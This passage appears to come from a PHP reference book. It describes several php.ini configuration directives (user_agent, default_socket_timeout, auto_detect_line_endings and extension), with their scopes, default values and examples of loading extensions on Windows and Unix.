     the username sharp and password xyz@note.com will be passed to the server when authentication is requested.

   user_agent = string
    Scope: PHP_INI_ALL; Default value: NULL
PHP always sends a content header along with its processed output, including a user agent attribute. This directive determines the value of that attribute.
   default_socket_timeout = integer
    Scope: PHP_INI_ALL; Default value: 60
This directive determines the time-out value of a socket-based stream, in seconds.
   auto_detect_line_endings = On | Off
    Scope: PHP_INI_ALL; Default value: Off
One never-ending source of developer frustration is derived from the end-of-line (EOL) character because of the varying syntax employed by different operating systems. Enabling auto_detect_line_endings determines whether the data read by fgets() and file() uses Macintosh, MS-DOS, or Linux file conventions.

Dynamic Extensions
This section contains a single directive, extension.
extension = string
Scope: PHP_INI_ALL; Default value: NULL
The extension directive is used to dynamically load a particular module. On the Win32 operating system, a module might be loaded like this:
    extension = php_java.dll
On Unix, it would be loaded like this:
    extension = php_java.so
Keep in mind that on either operating system, simply uncommenting or adding this line doesn’t necessarily enable the relevant extension. You’ll also need to ensure that the appropriate software is installed on the operating system. For example, to enable Java support, you also need to install the JDK.